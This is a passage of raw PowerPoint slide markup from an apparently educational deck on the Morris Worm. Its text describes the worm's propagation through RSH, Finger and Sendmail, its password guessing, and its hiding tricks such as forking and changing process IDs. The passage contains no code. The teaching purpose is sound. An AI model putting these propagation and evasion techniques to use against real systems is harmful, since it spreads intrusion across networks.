          <p:cNvPr id="29" name="Gruppieren 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9518687" y="78043"/>
            <a:ext cx="2491200" cy="943335"/>
            <a:chOff x="318444" y="1887083"/>
            <a:chExt cx="11221235" cy="3882150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Textfeld 29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="318444" y="3253205"/>
              <a:ext cx="2488554" cy="949954"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="003366"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="500" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0"/>
                <a:t>Gather information about network interfaces (incl. reachability tests)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31" name="Grafik 30"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3005659" y="2873782"/>
              <a:ext cx="1599701" cy="1915513"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rechteck 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1426352" y="1887083"/>
              <a:ext cx="1733537"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List of Target Machines</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Host A</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="33" name="Verbinder: gewinkelt 32"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="32" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="709388" y="2536244"/>
              <a:ext cx="960139" cy="473789"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">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4" name="Gruppieren 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3159884" y="1891281"/>
              <a:ext cx="4636280" cy="1399141"/>
              <a:chOff x="3159884" y="1891281"/>
              <a:chExt cx="4636280" cy="1399141"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="49" name="Gruppieren 48"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4613700" y="1891281"/>
                <a:ext cx="3182464" cy="1399141"/>
                <a:chOff x="4476250" y="1520888"/>
                <a:chExt cx="3182464" cy="1399141"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="51" name="Textfeld 50"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4560252" y="1520888"/>
                  <a:ext cx="3071495" cy="823296"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="003366"/>
                      </a:solidFill>
                    </a:rPr>
                    <a:t>2. </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Infection attempts: </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>(1.) RSH, (2.) Finger, (3.) </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0" err="1"/>
                    <a:t>Sendmail</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="200" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="52" name="Pfeil: nach rechts 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4476250" y="2642236"/>
                  <a:ext cx="3182464" cy="277793"/>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dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="50" name="Gerade Verbindung mit Pfeil 49"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="32" idx="3"/>
                <a:endCxn id="51" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3159884" y="2293071"/>
                <a:ext cx="1537816" cy="9860"/>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5" name="Gruppieren 34"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1319949" y="3519661"/>
              <a:ext cx="6476215" cy="2249572"/>
              <a:chOff x="1319949" y="3519661"/>
              <a:chExt cx="6476215" cy="2249572"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="41" name="Gruppieren 40"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1319949" y="4692617"/>
                <a:ext cx="3470649" cy="1076616"/>
                <a:chOff x="1876855" y="4558974"/>
                <a:chExt cx="3470649" cy="1076616"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="45" name="Textfeld 44"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1876855" y="4558974"/>
                  <a:ext cx="3470649" cy="1076616"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="003366"/>
                      </a:solidFill>
                    </a:rPr>
                    <a:t>3. </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Collect information about </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>users and hosts, try to break </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>password, try to connect to</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Victims with login-data</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="46" name="Gruppieren 45"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="4560252" y="4917314"/>
                  <a:ext cx="610484" cy="487857"/>
                  <a:chOff x="8000117" y="2650708"/>
                  <a:chExt cx="2003858" cy="1496114"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="47" name="Pfeil: nach oben gekrümmt 46"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm rot="10800000">
                    <a:off x="8000117" y="2650708"/>
                    <a:ext cx="1793718" cy="720550"/>
                  </a:xfrm>
                  <a:prstGeom prst="curvedUpArrow">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val 40000"/>
                      <a:gd name="adj2" fmla="val 93008"/>
                      <a:gd name="adj3" fmla="val 25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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="48" name="Pfeil: nach oben gekrümmt 47"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="8210257" y="3426272"/>
                    <a:ext cx="1793718" cy="720550"/>
                  </a:xfrm>
                  <a:prstGeom prst="curvedUpArrow">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val 40000"/>
                      <a:gd name="adj2" fmla="val 93008"/>
                      <a:gd name="adj3" fmla="val 25000"/>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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Pfeil: nach rechts 41"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4624701" y="3519661"/>
                <a:ext cx="3171463" cy="277793"/>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3" name="Rechteck 42"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5284258" y="4879932"/>
                <a:ext cx="1983673"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User/Password/Hosts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>User1/</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>abc</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>/Host A, Host B</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="44" name="Gerade Verbindung mit Pfeil 43"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="45" idx="3"/>
                <a:endCxn id="43" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4790596" y="5230925"/>
                <a:ext cx="493663" cy="54993"/>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pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="Grafik 35"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7811868" y="2872265"/>
              <a:ext cx="1506716" cy="1968186"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37" name="Gruppieren 36"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4590550" y="3865454"/>
              <a:ext cx="6608453" cy="1766704"/>
              <a:chOff x="4476250" y="3460336"/>
              <a:chExt cx="6608453" cy="1766704"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Textfeld 38"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7697567" y="4403745"/>
                <a:ext cx="3387136" cy="823295"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="500" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003366"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>4. </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0"/>
                  <a:t>Transfer and execute vector program, which re-connects to server and transfer the main-program</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="40" name="Pfeil: nach rechts 39"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="4476250" y="3460336"/>
                <a:ext cx="3171463" cy="27779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grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Textfeld 37"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9738655" y="3023379"/>
              <a:ext cx="1801024" cy="1076616"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="003366"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="003366"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="500" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>5. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0"/>
                <a:t>Main-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0" err="1"/>
                <a:t>ProgramInstantiation</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0"/>
                <a:t> and </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="200" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0"/>
                <a:t>“hiding itself “</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Pfeil: gestreift nach rechts 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1438872" y="3435644"/>
            <a:ext cx="642551" cy="521426"/>
          </a:xfrm>
          <a:prstGeom prst="stripedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42484"/>
              <a:gd name="adj2" fmla="val 50000"/>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812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Morris Worm: Main-Program Survival</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After successful infection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read all binary files into memory and delete all files on the disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Self-Check” enables simple counter attack: Fake worm on the TCP port </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 out of 7 worms would become immortal, even if there were other instances running</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		Many machines were overloaded with copies of the worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The worm would periodically fork itself and kill its parent process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scheduler would lower priorities of long running processes, thus forking itself it would retain normal scheduling priority</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Keep changing its process identifier, thus one could not observe on process accumulating massive amounts of CPU time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every 12 hours: Flush internal tables and re-infect the same machine</a:t>
            </a:r>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23</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Gruppieren 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9518687" y="78043"/>
            <a:ext cx="2491200" cy="943335"/>
            <a:chOff x="318444" y="1887083"/>
            <a:chExt cx="11221235" cy="3882150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Textfeld 29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="318444" y="3253205"/>
              <a:ext cx="2488554" cy="949954"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="003366"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="500" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0"/>
                <a:t>Gather information about network interfaces (incl. reachability tests)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31" name="Grafik 30"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3005659" y="2873782"/>
              <a:ext cx="1599701" cy="1915513"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rechteck 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1426352" y="1887083"/>
              <a:ext cx="1733537"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List of Target Machines</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Host A</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="33" name="Verbinder: gewinkelt 32"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="32" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="709388" y="2536244"/>
              <a:ext cx="960139" cy="473789"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">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4" name="Gruppieren 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3159884" y="1891281"/>
              <a:ext cx="4636280" cy="1399141"/>
              <a:chOff x="3159884" y="1891281"/>
              <a:chExt cx="4636280" cy="1399141"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="49" name="Gruppieren 48"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4613700" y="1891281"/>
                <a:ext cx="3182464" cy="1399141"/>
                <a:chOff x="4476250" y="1520888"/>
                <a:chExt cx="3182464" cy="1399141"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="51" name="Textfeld 50"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4560252" y="1520888"/>
                  <a:ext cx="3071495" cy="823296"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="003366"/>
                      </a:solidFill>
                    </a:rPr>
                    <a:t>2. </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Infection attempts: </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>(1.) RSH, (2.) Finger, (3.) </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0" err="1"/>
                    <a:t>Sendmail</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="200" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="52" name="Pfeil: nach rechts 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4476250" y="2642236"/>
                  <a:ext cx="3182464" cy="277793"/>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dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="50" name="Gerade Verbindung mit Pfeil 49"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="32" idx="3"/>
                <a:endCxn id="51" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3159884" y="2293071"/>
                <a:ext cx="1537816" cy="9860"/>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5" name="Gruppieren 34"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1319949" y="3519661"/>
              <a:ext cx="6476215" cy="2249572"/>
              <a:chOff x="1319949" y="3519661"/>
              <a:chExt cx="6476215" cy="2249572"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="41" name="Gruppieren 40"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1319949" y="4692617"/>
                <a:ext cx="3470649" cy="1076616"/>
                <a:chOff x="1876855" y="4558974"/>
                <a:chExt cx="3470649" cy="1076616"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="45" name="Textfeld 44"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1876855" y="4558974"/>
                  <a:ext cx="3470649" cy="1076616"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="003366"/>
                      </a:solidFill>
                    </a:rPr>
                    <a:t>3. </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Collect information about </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>users and hosts, try to break </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>password, try to connect to</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Victims with login-data</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:grpSp>
